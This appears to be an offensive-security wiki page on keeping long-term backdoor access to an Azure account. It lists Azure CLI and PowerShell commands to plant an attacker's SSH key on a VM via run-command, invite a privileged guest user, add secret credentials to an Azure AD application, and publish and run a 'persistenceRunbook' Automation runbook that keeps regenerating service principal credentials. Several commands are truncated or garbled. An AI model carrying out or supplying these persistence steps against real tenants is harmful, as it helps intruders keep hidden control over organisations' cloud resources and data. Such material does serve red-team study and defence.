We can create a backdoor and maintain long term access in azure account.
Local System Based Backdoor
Operating System based backdooring technique (Linux & Windows)
- SSH Backdoor using vm-runcommand privileges
Generates a new SSH key pair:
Displays the contents of the generated SSH key, which will be used to configure access on the remote VM:
cat az-vm-ssh-key
Adds the SSH key to the authorized_keys file on the remote VM, enabling persistent SSH access:
az vm run-command invoke --resource-group {Resource Group} -n {VM Name} --command-id RunShellScript --scripts "echo 'ssh-rsa SSHKey' >> /home/{username}/.ssh/authorized_keys"
Connects to the remote VM using the configured SSH key:
ssh -i {path_to_key} {username}@{VM_IP}
Cloud Service Based Backdoor
Creating user/guest user with high privileged aad role
To invite a Guest User to Tenant:
$Body="{'invitedUserEmailAddress':'Email Address to Invite', 'inviteRedirectUrl': ''}”
az rest --method POST --uri --headers "Content-Type=application/json" --body $Body
Creating service account and it's credentials
To generate a new password (credential) for an existing Azure AD application to maintain long-term access to the application:
New-AzureADApplication PasswordCredential-Objectld "{Application Object ID}"
Then, Authenticate to Azure AD with a service principal and secrets:
az login --service-principal -u {AppID} -p {App Secret} -t {TenantID}
Script to automate the creation of new Azure service principal as a backdoor:
Updating automation account runbook code
First, list Automation Accounts:
az automation account list --resource-group "{Resource Group Name}"
List Runbooks in an Automation Account:
az automation runbook list --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}"
Create a PowerShell Script for Persistent Access that will generate a new service principal and renew its credentials periodically:
Create a New Runbook:
az automation runbook create --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}" --name "persistenceRunbook" --type "PowerShell" --location "East US"
Replace the Runbook Content with the Persistence Script:
az automation runbook replace-content --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}" --name "persistenceRunbook" --content @/home/devuser/persistence.ps1
Publish the Runbook to Ensure It Can Be Run:
az automation runbook publish --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}" --name "persistenceRunbook"
Display Details About the Runbook:
az automation runbook show --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}" --name "persistenceRunbook"
Invoke the Runbook and Execute the Code Inside It:
az automation runbook start --automation-account-name "{Automation Account Name}" --resource-group "{Resource Group Name}" --name "persistenceRunbook"
Manipulating container registry
Creating long term shared access signature (SAS) for storage account
Last updated